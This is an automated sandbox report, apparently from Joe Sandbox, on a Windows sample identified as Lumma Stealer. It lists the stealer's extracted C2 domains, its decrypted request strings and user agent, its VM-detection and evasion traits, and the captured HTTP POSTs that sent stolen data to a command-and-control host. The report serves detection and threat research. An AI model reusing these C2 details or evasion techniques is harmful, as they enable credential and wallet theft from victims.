Windows Analysis Report
'Set-up.exe

Overview

General Information

Sample name: 'Set-up.exe
Analysis ID: 1584523
MD5: 762266932c784bb2723293ad1cbecc37
SHA1: 7983d7eda278567ba082c13b5690266212c447d4
SHA256: 792474b38315e55d49a76f68e97b8a6b498ca794decc326cbaef5df22476c88d
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

[Classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]
  • System is w10x64
  • 'Set-up.exe (PID: 3940 cmdline: "C:\Users\user\Desktop\'Set-up.exe" MD5: 762266932C784BB2723293AD1CBECC37)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{
  "C2 url": [
    "wholersorie.shop",
    "nearycrepso.shop",
    "tirepublicerj.shop",
    "cloudewahsj.shop",
    "framekgirus.shop",
    "rabidcowse.shop",
    "noisycuttej.shop",
    "passhudmrue.click",
    "abruptyopsn.shop"
  ],
  "Build id": "hRjzG3--DRON"
}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x52783:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: 'Set-up.exe PID: 3940 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: 'Set-up.exe PID: 3940 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
              No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-05T18:53:29.307820+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:31.283423+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:32.557598+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49788 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:33.713035+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49799 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:42.312298+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49851 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:44.138158+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49864 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:45.448469+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49875 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:46.922776+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49884 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:48.713395+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49900 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:30.081192+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:31.755774+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:30.081192+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49769 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:31.755774+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49778 | 172.67.178.174 | 443 | TCP
2025-01-05T18:53:41.657467+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49799 | 172.67.178.174 | 443 | TCP

              AV Detection

Source: 'Set-up.exe.3940.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["wholersorie.shop", "nearycrepso.shop", "tirepublicerj.shop", "cloudewahsj.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "passhudmrue.click", "abruptyopsn.shop"], "Build id": "hRjzG3--DRON"}
Source: 'Set-up.exe | Virustotal: Detection: 18%
Source: 'Set-up.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 92.9% probability
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: passhudmrue.click
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2459089767.00000000023D0000.00000040.00001000.00020000.00000000.sdmp | String decryptor: hRjzG3--DRON
Source: 'Set-up.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49769 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49778 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49799 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49851 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49864 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49875 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.178.174:443 -> 192.168.2.6:49884 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49769 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49769 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49778 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49778 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49799 -> 172.67.178.174:443
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: passhudmrue.click
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49769 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49778 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49788 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49799 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49851 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49864 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49875 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49884 -> 172.67.178.174:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49900 -> 172.67.178.174:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 78 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=EORV0HD9UWAKJ2L405H | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12864 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=WIUPQMPL | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15044 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=NF6QEJRIK626LVRM | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19950 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=3YYU6JSELTHBZSEBED | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 5475 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=94KFIXWAMD | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 911 | Host: passhudmrue.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=QNDAGIME | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 572454 | Host: passhudmrue.click
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: 'Set-up.exe | String found in binary or memory: ID: %shttps://www.youtube.com/watch?v=Zk9J5xnTVMAZk9J5xnTVMAPlease enter one URL per linePlease enter at least one URL.You may enter an URL or ID. equals www.youtube.com (Youtube)
Source: global traffic | DNS traffic detected: DNS query: passhudmrue.click
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: passhudmrue.click
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 'Set-up.exe | String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: 'Set-up.exe, 00000000.00000003.2430771880.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419550458.0000000000945000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458966002.0000000000985000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457833420.0000000000983000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsoft
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: 'Set-up.exe | String found in binary or memory: http://crl.starfieldtech.com/repository/0
Source: 'Set-up.exe | String found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
Source: 'Set-up.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: 'Set-up.exe | String found in binary or memory: http://ocsp.starfieldtech.com/0D
Source: 'Set-up.exe | String found in binary or memory: http://ocsp.thawte.com0
Source: 'Set-up.exe | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 'Set-up.exe | String found in binary or memory: http://s2.symcb.com0
Source: 'Set-up.exe | String found in binary or memory: http://sf.symcb.com/sf.crl0f
Source: 'Set-up.exe | String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: 'Set-up.exe | String found in binary or memory: http://sf.symcd.com0&
Source: 'Set-up.exe | String found in binary or memory: http://sv.symcb.com/sv.crl0W
Source: 'Set-up.exe | String found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: 'Set-up.exeString found in binary or memory: http://sv.symcd.com0&
              Source: 'Set-up.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: 'Set-up.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: 'Set-up.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: 'Set-up.exeString found in binary or memory: http://www.fuxiangliu.com/services%s/youtube.com-sig.js//s.ytimg.com//www.youtube.comvar
              Source: 'Set-up.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: 'Set-up.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: 'Set-up.exe, 00000000.00000003.2387658768.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 'Set-up.exe | String found in binary or memory: https://api.github.com/repos/ytdl-org/ytdl-nightly/releases/latestMX_ytdlbrowser_download_urlyoutube
              Source: 'Set-up.exe | String found in binary or memory: https://cdn-fck.tnaflix.com/tnaflix/%s.fid?key=%s&VID=%s&nomp4=1&catID=0&rollover=1&startThumb=%s&em
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: 'Set-up.exe | String found in binary or memory: https://d.symcb.com/cps0%
              Source: 'Set-up.exe | String found in binary or memory: https://d.symcb.com/rpa0
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: 'Set-up.exe, 00000000.00000003.2290502332.0000000003786000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290436655.0000000003789000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2290681074.0000000003786000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: 'Set-up.exe | String found in binary or memory: https://hotmovs.comhttps://www.hqporner.com/hqpornerhqporner.com
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419435129.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419615846.000000000092E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/
              Source: 'Set-up.exe, 00000000.00000003.2387217571.0000000003754000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387007822.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387037149.0000000003753000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/0
              Source: 'Set-up.exe, 00000000.00000003.2301552831.0000000003756000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2301601874.0000000003759000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/44
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/E
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/N
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/R
              Source: 'Set-up.exe, 'Set-up.exe, 00000000.00000003.2387053410.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458003560.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458936317.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419642946.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434822982.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458113896.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457889124.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2387007822.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439840197.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457690210.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2458916538.000000000092F000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2458003560.0000000000946000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2430866235.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439659352.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289335741.000000000092C000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419375927.0000000000994000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2289458694.000000000092E000.00000004.00000020.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2459592358.000000000374D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/api
              Source: 'Set-up.exe, 00000000.00000003.2434822982.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2457889124.000000000374B000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2439659352.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000002.2459592358.000000000374D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/api9T)
              Source: 'Set-up.exe, 00000000.00000003.2434892748.0000000000947000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/api?l/h
              Source: 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/apiNp
              Source: 'Set-up.exe, 00000000.00000003.2301498819.000000000374D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/apiQ.
              Source: 'Set-up.exe, 00000000.00000003.2399629443.0000000003748000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2399646232.000000000374B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/apihF)
              Source: 'Set-up.exe, 00000000.00000003.2419112504.0000000003749000.00000004.00000800.00020000.00000000.sdmp, 'Set-up.exe, 00000000.00000003.2419283872.000000000374B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/apis
              Source: 'Set-up.exe, 00000000.00000003.2289335741.0000000000946000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/c
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/e
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/rx
              Source: 'Set-up.exe, 00000000.00000002.2459545869.0000000003730000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click/t
              Source: 'Set-up.exe, 00000000.00000003.2439840197.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://passhudmrue.click:443/api
